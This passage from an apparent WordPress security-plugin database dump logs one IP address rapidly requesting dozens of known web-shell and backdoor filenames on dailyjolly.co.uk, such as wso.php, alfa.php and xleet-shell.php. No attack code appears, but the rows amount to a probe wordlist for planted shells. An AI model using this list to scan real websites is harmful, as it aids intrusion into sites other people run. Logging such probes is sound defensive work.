scTIGCVg','','19|0|0|0|dailyjolly.co.uk/ne.php',0,19,0),('3.70.167.47',54961967,'',0,1673950183.6464,55,'2OIiFly4oGPUvwBQaSbu7zjc','','19|0|0|0|dailyjolly.co.uk/ne.php',0,19,0),('3.70.167.47',54961967,'',0,1673950202.4087,55,'RxLyiamD8IJOrnsX3KHf1BTh','','19|0|0|0|dailyjolly.co.uk/y.php',0,19,0),('3.70.167.47',54961967,'',0,1673950203.3781,55,'BS7vlofxi32kZyhDNsnqjPKE','','19|0|0|0|dailyjolly.co.uk/y.php',0,19,0),('3.70.167.47',54961967,'',0,1673950203.4553,55,'YUEMtGrso8lR9TzwPS4jDyuh','','19|0|0|0|dailyjolly.co.uk/wp-content/wp.php',0,19,0),('3.70.167.47',54961967,'',0,1673950204.0564,55,'xrUKmSRkut6TzahH0ni12eVA','','19|0|0|0|dailyjolly.co.uk/wp-content/wp.php',0,19,0),('3.70.167.47',54961967,'',0,1673950222.9307,55,'KDwmt7yEWf8SsnN2JvQVjOcl','','19|0|0|0|dailyjolly.co.uk/1975.php',0,19,0),('3.70.167.47',54961967,'',0,1673950222.9449,55,'WnsiCISBMNZdYp91qyRfDVFj','','19|0|0|0|dailyjolly.co.uk/xleet-shell.php',0,19,0),('3.70.167.47',54961967,'',0,1673950222.9540,55,'kxrSNnZ9zFj6DuUKtBHYWoAb','','19|0|0|0|dailyjolly.co.uk/Uploader.php',0,19,0),('3.70.167.47',54961967,'',0,1673950222.9956,55,'OAgK7BP219fjzX5nZr3UvVcy','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('3.70.167.47',54961967,'',0,1673950223.1406,55,'5txbqM7PwTIpjBzJNHQs96gn','','19|0|0|0|dailyjolly.co.uk/2.php',0,19,0),('3.70.167.47',54961967,'',0,1673950223.3621,55,'g7JG6z5D1UPMAKRO9SBkeWEL','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950223.4849,55,'FuVEiTthZ2PgQNBXcfrjvdak','','19|0|0|0|dailyjolly.co.uk/1975.php',0,19,0),('3.70.167.47',54961967,'',0,1673950223.7571,55,'XS1WIKh2B9kRsLxJldTocN37','','19|0|0|0|dailyjolly.co.uk/xleet-shell.php',0,19,0),('3.70.167.47',54961967,'',0,1673950223.9048,55,'5xhJSurc6iqbCQ7HRBWw0lmn','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/config.bak.php',0,19,0),('3.70.167.47',54961967,'',0,1673950224.1482,55,'UJRwp2GqLo8Dj5hAlsvZazSM','','19|0|0|0|dailyjolly.co.uk/2.php',0,19,0),('3.70.167.47',54961967,'',0,1673950224.3561,55,'4c2NLYlhPjkOpeu5SdgmXaUF','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950225.1493,55,'8l9DMBjRCZvyEf1roYnk0aW6','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('3.70.167.47',54961967,'',0,1673950225.4849,55,'dB5iWmCq0Fk6r4NTzSIDM3Up','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/config.bak.php',0,19,0),('3.70.167.47',54961967,'',0,1673950225.5605,55,'JU0vprc2LahmFq85P1szRKO3','','19|0|0|0|dailyjolly.co.uk/Uploader.php',0,19,0),('3.70.167.47',54961967,'',0,1673950236.2565,100,'d5VyiMOKmecuxWbrjolNaAJ8','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('3.70.167.47',54961967,'',0,1673950236.2574,55,'XFUBMNCnfrHz5h9LRpqsKV8J','','19|0|0|0|dailyjolly.co.uk/wp-content/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950236.2711,55,'ED9wP1sqYfyjKZXrBRLuQWkM','','19|0|0|0|dailyjolly.co.uk/403.php',0,19,0),('3.70.167.47',54961967,'',0,1673950237.8787,55,'aBNgLvDZo68eu4TsrCnyMblU','','19|0|0|0|dailyjolly.co.uk/403.php',0,19,0),('3.70.167.47',54961967,'',0,1673950237.9186,100,'nHcrvAO6bqkSlyzTLx3Ej7Rf','','13|0|0|0|dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('3.70.167.47',54961967,'',0,1673950237.9879,55,'VzkfB9N1mSgLdin7HyQqRCKa','','19|0|0|0|dailyjolly.co.uk/wp-content/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950265.6979,55,'8zxKahF5UQH70RCj2mXZLwpe','','19|0|0|0|dailyjolly.co.uk/i.php',0,19,0),('3.70.167.47',54961967,'',0,1673950266.5751,55,'0MfpYbumOy1cPHdvXQVeko2F','','19|0|0|0|dailyjolly.co.uk/i.php',0,19,0),('3.70.167.47',54961967,'',0,1673950283.1482,55,'Gnh3p8rER7QDd9qoZgBcb4SA','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('3.70.167.47',54961967,'',0,1673950284.1484,55,'894KJfSgylAB6OWPdpDrRiuF','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('3.70.167.47',54961967,'',0,1673950290.4486,50,'oZ6stCxGnLUh8e4VYAOmgH1K','','13|0|0|0|dailyjolly.co.uk/wp-load.php',0,13,0),('3.70.167.47',54961967,'',0,1673950293.2190,50,'oJKPL9nCuG71086N5rcDveUp','','13|0|0|0|dailyjolly.co.uk/wp-load.php',0,13,0),('3.70.167.47',54961967,'',0,1673950319.7942,55,'o7nRLwWH2zvZ43QjMC0xKGEb','','19|0|0|0|dailyjolly.co.uk/blog.php',0,19,0),('3.70.167.47',54961967,'',0,1673950321.8643,55,'GAaKM0w1F4H3eR7qtULBb8h5','','19|0|0|0|dailyjolly.co.uk/blog.php',0,19,0),('3.70.167.47',54961967,'',0,1673950327.9765,55,'OhSCDuGY7dZBgImq2e5LVwvz','','19|0|0|0|dailyjolly.co.uk/5.php',0,19,0),('3.70.167.47',54961967,'',0,1673950327.9892,55,'loVP4QvIispxcSKEe3qGnrtB','','19|0|0|0|dailyjolly.co.uk/wp-includes/IXR/hunt.php',0,19,0),('3.70.167.47',54961967,'',0,1673950328.3058,100,'CXhATJaDjsFofzKduMx0n1VU','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/gaukingo/db.php',0,13,0),('3.70.167.47',54961967,'',0,1673950328.9572,55,'nQrH14V0O5xkqePaoUhRAwfz','','19|0|0|0|dailyjolly.co.uk/5.php',0,19,0),('3.70.167.47',54961967,'',0,1673950329.8857,55,'cYUm6grkPnsQH79oz15iD2ep','','19|0|0|0|dailyjolly.co.uk/old-index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950330.5515,55,'JCsXVDz0AiefNRndrPGB98E3','','19|0|0|0|dailyjolly.co.uk/old-index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950331.1700,55,'mjuVQJYCltynoqBaK9wPGzsh','','19|0|0|0|dailyjolly.co.uk/wp-includes/IXR/hunt.php',0,19,0),('3.70.167.47',54961967,'',0,1673950331.9866,100,'LJeHfDdF1sRqZk2y4rxiYlCB','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/gaukingo/db.php',0,13,0),('3.70.167.47',54961967,'',0,1673950444.1724,55,'6vh7WLNnbKBaT9r35tgXimkq','','19|0|0|0|dailyjolly.co.uk/wp-includes/991176.php',0,19,0),('3.70.167.47',54961967,'',0,1673950446.3678,55,'ayMGo7TlUN29nXgKzVJ4c0ut','','19|0|0|0|dailyjolly.co.uk/wp-includes/991176.php',0,19,0),('3.70.167.47',54961967,'',0,1673950458.0971,55,'Tfu243mFnEcsO0PGRLdpI9hW','','19|0|0|0|dailyjolly.co.uk/wp-admin/radio.php',0,19,0),('3.70.167.47',54961967,'',0,1673950458.2577,55,'y4URE26K0J9ZPACGjhztguxQ','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('3.70.167.47',54961967,'',0,1673950458.3021,55,'pkKwefCS1gz3NYjvrTo2WObJ','','19|0|0|0|dailyjolly.co.uk/f.php',0,19,0),('3.70.167.47',54961967,'',0,1673950458.4229,55,'vRD0ndfWjGrYhIpMe46PZNu5','','19|0|0|0|dailyjolly.co.uk/8.php',0,19,0),('3.70.167.47',54961967,'',0,1673950458.6177,55,'OvpV6orf1mUEHzuc24Kj3ZJL','','19|0|0|0|dailyjolly.co.uk/wp-admin/radio.php',0,19,0),('3.70.167.47',54961967,'',0,1673950459.0735,55,'GrloIPUYKViu7npaR283Wcmx','','19|0|0|0|dailyjolly.co.uk/f.php',0,19,0),('3.70.167.47',54961967,'',0,1673950459.0848,55,'Zw4m1JGCpN2HfOASnDQkPLFa','','19|0|0|0|dailyjolly.co.uk/8.php',0,19,0),('3.70.167.47',54961967,'',0,1673950459.2469,55,'Bg9qjAdiSOC0QKoHNYPfTVnE','','19|0|0|0|dailyjolly.co.uk/wikindex.php',0,19,0),('3.70.167.47',54961967,'',0,1673950461.7598,55,'tB401I2aMxNlLHGVOwSUFEi3','','19|0|0|0|dailyjolly.co.uk/h.php',0,19,0),('3.70.167.47',54961967,'',0,1673950463.6340,55,'8ZefSyzskgvdmML6PD75JT2a','','19|0|0|0|dailyjolly.co.uk/h.php',0,19,0),('3.70.167.47',54961967,'',0,1673950470.9179,55,'sfvB8PHbdr0R6cV9jJ3zwoE4','','19|0|0|0|dailyjolly.co.uk/gank.php.PhP',0,19,0),('3.70.167.47',54961967,'',0,1673950471.7788,55,'36axnJHLwecRmSVNXod0DsIv','','19|0|0|0|dailyjolly.co.uk/gank.php.PhP',0,19,0),('3.70.167.47',54961967,'',0,1673950501.2725,55,'gpjP5V2Zqli9d6LCzeNBb0DW','','19|0|0|0|dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('3.70.167.47',54961967,'',0,1673950501.5329,55,'0fQR8GMcKEDX4O7jl1BY9IHy','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950501.7188,55,'I0B896JFXbvj4qGKcxYt7Uzd','','19|0|0|0|dailyjolly.co.uk/admin.php',0,19,0),('3.70.167.47',54961967,'',0,1673950501.7795,55,'jIRVfoFZEC1sWazSi7PbnNx6','','19|0|0|0|dailyjolly.co.uk/swm.php',0,19,0),('3.70.167.47',54961967,'',0,1673950502.0006,55,'uocewBgIl3mKTD0fLYRbUtVQ','','19|0|0|0|dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('3.70.167.47',54961967,'',0,1673950502.1863,55,'1EC5yPRX2ltkeYaBOzTcKNMI','','19|0|0|0|dailyjolly.co.uk/admin.php',0,19,0),('3.70.167.47',54961967,'',0,1673950502.2765,55,'sv8z4EpiDR7jQVgmSFZLMkXc','','19|0|0|0|dailyjolly.co.uk/swm.php',0,19,0),('3.70.167.47',54961967,'',0,1673950502.3318,55,'Rv4ZOUGXMcfFNpDIwxqCAuLt','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950505.6147,55,'CpslLTbgZ2OoBxYkq5cvzUw8','','19|0|0|0|dailyjolly.co.uk/.cgi/cache/index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.1718,55,'UBoEWpfM34iygxTj1qXHvIN8','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.1910,55,'NGoHSdBZzmnEFeaxbXwsKAyC','','19|0|0|0|dailyjolly.co.uk/wp-admin/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.2745,55,'Vh1u0oSgdi2aZyL8bnCWmpRU','','19|0|0|0|dailyjolly.co.uk/fox.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.3307,55,'mnqOR9kyFlNeC6JpuK1tPzQ2','','19|0|0|0|dailyjolly.co.uk/xltavrat.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.3708,55,'zogCSwdRjGIb1mvT4OlW9Yt7','','19|0|0|0|dailyjolly.co.uk/.cgi/cache/index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.6650,55,'Ls12ckSN7gVKR305d6iI8PDU','','19|0|0|0|dailyjolly.co.uk/fox.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.6748,55,'4Q8jYPBUqJZbKkXISE2Mrpel','','19|0|0|0|dailyjolly.co.uk/wp-admin/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.7089,55,'hf9OS4MoKV62dlJANruXQGmt','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('3.70.167.47',54961967,'',0,1673950506.8192,55,'B3RQpkjFalbZDCsJm16i2zt0','','19|0|0|0|dailyjolly.co.uk/xltavrat.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.2414,55,'HluPF5Q0ncK9CbB6eyLT3Zij','','19|0|0|0|dailyjolly.co.uk/wp/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.2752,55,'GiUYsoOukNeR1ywIV89D50rz','','19|0|0|0|dailyjolly.co.uk/xindex.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.3102,55,'kdngFvauiTlyBNpXs4RH5O6z','','19|0|0|0|dailyjolly.co.uk/wso112233.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.3812,55,'B47Pk0jTcDnYWCfIhdJmpgyl','','19|0|0|0|dailyjolly.co.uk/ok.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.3887,55,'KWJpVumQgD2cI3LBE0ynTjC4','','19|0|0|0|dailyjolly.co.uk/wp-content/wso.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.4058,55,'6GScyanLIdv80jDtU2mswOHx','','19|0|0|0|dailyjolly.co.uk/.tmb/cache/shz.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.4240,100,'kqdoUDNi7xQp8mZEebJAntMy','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,13,0),('3.70.167.47',54961967,'',0,1673950507.4902,55,'KlhN4qYRGBZSvOVy5m90U7Cw','','19|0|0|0|dailyjolly.co.uk/l.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.5063,55,'LYQJKuC69cVeWqI4PDsrO8l3','','19|0|0|0|dailyjolly.co.uk/mari.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.5075,55,'X94fPECjBdr1UkglpLxVyAZN','','19|0|0|0|dailyjolly.co.uk/modules/modules/modules.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.5136,55,'EWS9TCaJvUMfn4VgBOc1NH0d','','19|0|0|0|dailyjolly.co.uk/wp-blog.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.5327,55,'BJltLYogVWhfUsXZKmCI218e','','19|0|0|0|dailyjolly.co.uk/test/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.9338,55,'IfmWzGHCZFskJuAwMQDR7l91','','19|0|0|0|dailyjolly.co.uk/xindex.php',0,19,0),('3.70.167.47',54961967,'',0,1673950507.9941,55,'ZXt1CrsFMLJwzO80a4RNgIvx','','19|0|0|0|dailyjolly.co.uk/l.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.0091,55,'STUzgKBYd9Nji7shRAXEmQI8','','19|0|0|0|dailyjolly.co.uk/wp/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.0102,55,'VsItixW04DXohOw3Nj8fZqlF','','19|0|0|0|dailyjolly.co.uk/.tmb/cache/shz.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.0711,55,'gXWG3dUEJNi9e5tBO42zMvpw','','19|0|0|0|dailyjolly.co.uk/wp-blog.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.1545,55,'6Ie1yMPiD7zTaZWEjcxJsXFV','','19|0|0|0|dailyjolly.co.uk/wso112233.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.1645,100,'psbruohe12WMTUwN5VacJdCy','','13|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,13,0),('3.70.167.47',54961967,'',0,1673950508.1689,55,'qTBwXmrL4z2s6cG3NE8efZoI','','19|0|0|0|dailyjolly.co.uk/ok.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.1950,55,'v0OAIQLJiWGfjc16ZtydKRMk','','19|0|0|0|dailyjolly.co.uk/test/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.2104,55,'K4Bx7iocD1Hbj9Ie65qZYpMl','','19|0|0|0|dailyjolly.co.uk/wp-content/wso.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.2786,55,'WMvFz7dwPu631EcelCyJthg2','','19|0|0|0|dailyjolly.co.uk/modules/modules/modules.php',0,19,0),('3.70.167.47',54961967,'',0,1673950508.2981,55,'3mxyQeO9vjzBCgGDWdI2qMwH','','19|0|0|0|dailyjolly.co.uk/mari.php',0,19,0),('3.70.167.47',54961967,'',0,1673950545.5190,55,'Cag4UGFetBMuPvEpcLrY52Sz','','19|0|0|0|dailyjolly.co.uk/xx.php',0,19,0),('3.70.167.47',54961967,'',0,1673950545.5272,55,'saPS1AvUqeDVH9TmbBcFzu2d','','19|0|0|0|dailyjolly.co.uk/blog/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950545.5681,55,'GytdcuwWe3nHLOBSRlkI1bPV','','19|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,19,0),('3.70.167.47',54961967,'',0,1673950545.6018,55,'uQCF1vdrJ9YUZISKtbOwXDkl','','19|0|0|0|dailyjolly.co.uk/small.php',0,19,0),('3.70.167.47',54961967,'',0,1673950545.6018,55,'nwUSz9fpQhYm1ADOLyvj5a0s','','19|0|0|0|dailyjolly.co.uk/wp-class.php',0,19,0),('3.70.167.47',54961967,'',0,1673950545.6178,55,'9ItByKL6eOabFnlXDZoVgGsS','','19|0|0|0|dailyjolly.co.uk/content.php',0,19,0),('3.70.167.47',54961967,'',0,1673950545.6225,55,'yIbuwreCAO1qzV2olGadcYF8','','19|0|0|0|dailyjolly.co.uk/shx.php',0,19,0),('3.70.167.47',54961967,'',0,1673950545.6352,55,'8rOEeTAkN93msocxyvQZfJD5','','19|0|0|0|dailyjolly.co.uk/defau1t.php',0,19,0),('3.70.167.47',54961967,'',0,1673950546.0974,55,'ZkJ0u8TNOvbLQamgfjyVKsF5','','19|0|0|0|dailyjolly.co.uk/xx.php',0,19,0),('3.70.167.47',54961967,'',0,1673950546.1507,55,'6C4MKvDwluFs1cfbLZJX3tqP','','19|0|0|0|dailyjolly.co.uk/wp-class.php',0,19,0),('3.70.167.47',54961967,'',0,1673950546.1986,55,'X5ZzToBqNMAd4shk9HifpJlS','','19|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,19,0),('3.70.167.47',54961967,'',0,1673950546.2309,55,'B2SgnJOENw08DkIeyciX3Z6H','','19|0|0|0|dailyjolly.co.uk/blog/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950546.4547,55,'Uk32ZvhSfjPamFOMnGdgKBY7','','19|0|0|0|dailyjolly.co.uk/shx.php',0,19,0),('3.70.167.47',54961967,'',0,1673950546.6101,55,'y4h21mLkUcSrX3spVOg7zeJQ','','19|0|0|0|dailyjolly.co.uk/defau1t.php',0,19,0),('3.70.167.47',54961967,'',0,1673950546.6237,55,'6RQ7JYvzyaitIO9D0No45VP3','','19|0|0|0|dailyjolly.co.uk/small.php',0,19,0),('3.70.167.47',54961967,'',0,1673950546.6344,55,'tSEDv2KrP14TlpHOm5BaCZbI','','19|0|0|0|dailyjolly.co.uk/content.php',0,19,0),('3.70.167.47',54961967,'',0,1673950558.7377,55,'Cg4aOQF2GXLJnNqlfykwt71v','','19|0|0|0|dailyjolly.co.uk/jindex.php',0,19,0),('3.70.167.47',54961967,'',0,1673950559.6776,55,'Gu1FDvnyTqc6iC95PjaQpWZH','','19|0|0|0|dailyjolly.co.uk/jindex.php',0,19,0),('3.70.167.47',54961967,'',0,1673950565.8079,55,'FJqIl9Y1pcyST0MCPLm6Re2n','','19|0|0|0|dailyjolly.co.uk/xleet.php',0,19,0),('3.70.167.47',54961967,'',0,1673950565.8103,55,'Iw2NQEWDOb4vLM8tFzcSZorp','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950565.8521,100,'aLn1lWZRUfJ9qpTtQme6VoDd','','13|0|0|0|dailyjolly.co.uk/ff.php',0,13,0),('3.70.167.47',54961967,'',0,1673950565.9043,55,'AY0Ku4F5W3LqjBhgodVeca7b','','19|0|0|0|dailyjolly.co.uk/wp.php',0,19,0),('3.70.167.47',54961967,'',0,1673950565.9082,55,'XMRIz2uPts5SG8UV6DeYTn4p','','19|0|0|0|dailyjolly.co.uk/up.php',0,19,0),('3.70.167.47',54961967,'',0,1673950565.9484,55,'dBZRgqzjlK12aDyk8GcH0Oom','','19|0|0|0|dailyjolly.co.uk/export.php',0,19,0),('3.70.167.47',54961967,'',0,1673950565.9497,55,'Th7Ygyt9bEnVdNsiQ5oMCzxa','','19|0|0|0|dailyjolly.co.uk/wp-admin/x.php',0,19,0),('3.70.167.47',54961967,'',0,1673950565.9521,55,'XrIFf2bkpuqAonKyPGaCv4eM','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.0672,55,'gtjsFITSVRhcwX64zA0QqUkL','','19|0|0|0|dailyjolly.co.uk/z.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.4162,100,'CNZnc1HG24R5awSpVxAXJq03','','13|0|0|0|dailyjolly.co.uk/ff.php',0,13,0),('3.70.167.47',54961967,'',0,1673950566.4291,55,'pDg2YZPnhXTLjCv8I3ldxUVQ','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.4344,55,'QOIGhXUl7t2JL1n8Mrd90eKz','','19|0|0|0|dailyjolly.co.uk/wp.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.4422,55,'Zz3mlUhda4HoCYxRDvq5Pw0K','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.4469,55,'luK7dQmCpajAZPyzX5fYTFb9','','19|0|0|0|dailyjolly.co.uk/export.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.4650,55,'ho93Vs7l2mzpaWnLkR1Ij64g','','19|0|0|0|dailyjolly.co.uk/xleet.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.5378,55,'QdRtZwCGMxTOfekX2oqg5bsu','','19|0|0|0|dailyjolly.co.uk/z.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.5556,55,'Rxn12eKIdcmktfsqjFH4TQAp','','19|0|0|0|dailyjolly.co.uk/up.php',0,19,0),('3.70.167.47',54961967,'',0,1673950566.6771,55,'wSgz6aNY7FKR5Ly2Crhq0P8A','','19|0|0|0|dailyjolly.co.uk/wp-admin/x.php',0,19,0),('3.70.167.47',54961967,'',0,1673950578.0625,55,'gPH2rlxVQR7GZ9sDKjT8UhAz','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('3.70.167.47',54961967,'',0,1673950582.8976,55,'V6AsQSioxY7Wkz1Bpv2mLUK0','','19|0|0|0|dailyjolly.co.uk/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950583.3609,55,'4XedmIqfSK3trzNoOQ0u2AVw','','19|0|0|0|dailyjolly.co.uk/4price.php',0,19,0),('3.70.167.47',54961967,'',0,1673950589.3706,55,'eGjlSdRCkZ3f2unJ0vBsMmXH','','19|0|0|0|dailyjolly.co.uk/fw.php',0,19,0),('3.70.167.47',54961967,'',0,1673950594.3564,55,'8iPB4GFczHIXL0rdnoRmMQNy','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('3.70.167.47',54961967,'',0,1673950595.0590,55,'Jzt8VZTfcKlMbAXnF7gHGSRw','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('3.70.167.47',54961967,'',0,1673950595.9989,55,'0AJg8EfSrQPI7ekmVFunYZbo','','19|0|0|0|dailyjolly.co.uk/4price.php',0,19,0),('3.70.167.47',54961967,'',0,1673950596.4249,55,'yFlYRcjqwLUmiM1gv2T09HfO','','19|0|0|0|dailyjolly.co.uk/about.php',0,19,0),('3.70.167.47',54961967,'',0,1673950597.4799,55,'jSF57DckhQusnTBXEMoAbGNr','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('3.70.167.47',54961967,'',0,1673950598.0986,55,'MhK5G9cnk1vPJWtx3id2fB4U','','19|0|0|0|dailyjolly.co.uk/about.php',0,19,0),('3.70.167.47',54961967,'',0,1673950611.7838,55,'tq6wMdYlsy0cbajLAknX8J7K','','19|0|0|0|dailyjolly.co.uk/wso1.php',0,19,0),('3.70.167.47',54961967,'',0,1673950612.4273,55,'M4U2cAb9YCPQrS6gFvfaTxlX','','19|0|0|0|dailyjolly.co.uk/wso1.php',0,19,0),('3.70.167.47',54961967,'',0,1673950614.5031,55,'guKyad74x8UXvOq1o5H2TChJ','','19|0|0|0|dailyjolly.co.uk/fx.php',0,19,0),('3.70.167.47',54961967,'',0,1673950614.5722,55,'hVwspA35lJWqNbL8ZRoIHiM7','','19|0|0|0|dailyjolly.co.uk/license.php',0,19,0),('3.70.167.47',54961967,'',0,1673950614.6041,55,'BUrZpYMfGXbHCR9OcEdFKmzI','','19|0|0|0|dailyjolly.co.uk/k.php',0,19,0),('3.70.167.47',54961967,'',0,1673950614.9077,55,'a75dFgXqYwijTS1uIPbeJZBc','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('3.70.167.47',54961967,'',0,1673950618.5592,55,'UPuMq0ZcxsaNySBWGmz3LkIj','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('3.70.167.47',54961967,'',0,1673950618.5929,55,'crpf5uSIU4az3EHxoGwChgmN','','19|0|0|0|dailyjolly.co.uk/k.php',0,19,0),('3.70.167.47',54961967,'',0,1673950619.6772,55,'ZdNzycHmY5XUWqVhp4fDsTxE','','19|0|0|0|dailyjolly.co.uk/license.php',0,19,0),('3.70.167.47',54961967,'',0,1673950619.9105,55,'oOcDJATaiju2xKwnXhzFC5IP','','19|0|0|0|dailyjolly.co.uk/fx.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.1031,55,'i7tXhKBJYk5lmFnrPNwUq4xv','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.1121,55,'LkS0YV6PWNtbHU2rmsRzodlG','','19|0|0|0|dailyjolly.co.uk/xmlrpcs.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.1916,55,'hVdTuvZ3IRGBapqD1YWPtNEw','','19|0|0|0|dailyjolly.co.uk/ws.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.2085,55,'LOtICQKlmHFio6A9jkfBDnP4','','19|0|0|0|dailyjolly.co.uk/site/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.2144,55,'SedI5fC9E0wAQPxLOM6FunWt','','19|0|0|0|dailyjolly.co.uk/sendmail.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.2486,55,'KcvjID30qo1luBXt6GACxWpS','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.2722,55,'zvLeY5X4uKVbZq3UmEPxsBow','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.7956,55,'hE3UBJlMGcjQdRNWnskF1fub','','19|0|0|0|dailyjolly.co.uk/sendmail.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.9202,55,'satSTP1O9xiALVI4fjqJKgBG','','19|0|0|0|dailyjolly.co.uk/xmlrpcs.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.9422,55,'8iUwfdhaZm2T1W9OnAFHIq5v','','19|0|0|0|dailyjolly.co.uk/0z.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.9629,55,'9rnmTNUoCcSRQejE4yMfq8w6','','19|0|0|0|dailyjolly.co.uk/ups.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.9955,55,'oYymA6UB5V2i0gJXeNLnarKp','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('3.70.167.47',54961967,'',0,1673950625.9970,55,'xwTQuPgO0X3bpVNWMsRnvCm9','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('3.70.167.47',54961967,'',0,1673950626.0086,55,'wajMPU2rBVDHANhlZkeO7SYp','','19|0|0|0|dailyjolly.co.uk/ws.php',0,19,0),('3.70.167.47',54961967,'',0,1673950626.3254,55,'WgA7Zrb5dNnQJzPIHORsK90V','','19|0|0|0|dailyjolly.co.uk/site/wp-content/themes/seotheme/mar.php',0,19,0),('3.70.167.47',54961967,'',0,1673950626.3540,55,'YuW0G3F9kAnDTQozhEeHfbw2','','19|0|0|0|dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('3.70.167.47',54961967,'',0,1673950628.0367,55,'2N1fDSWCzZdcq4pB6xLeFklu','','19|0|0|0|dailyjolly.co.uk/0z.php',0,19,0),('3.70.167.47',54961967,'',0,1673950628.1389,55,'gz8ZtVi5fInvTqb73K2UDAy9','','19|0|0|0|dailyjolly.co.uk/ups.php',0,19,0),('3.70.167.47',54961967,'',0,1673950790.9680,55,'nuvWKAibtYm9UTpjwkLSBR4o','','19|0|0|0|dailyjolly.co.uk/b.php',0,19,0),('3.70.167.47'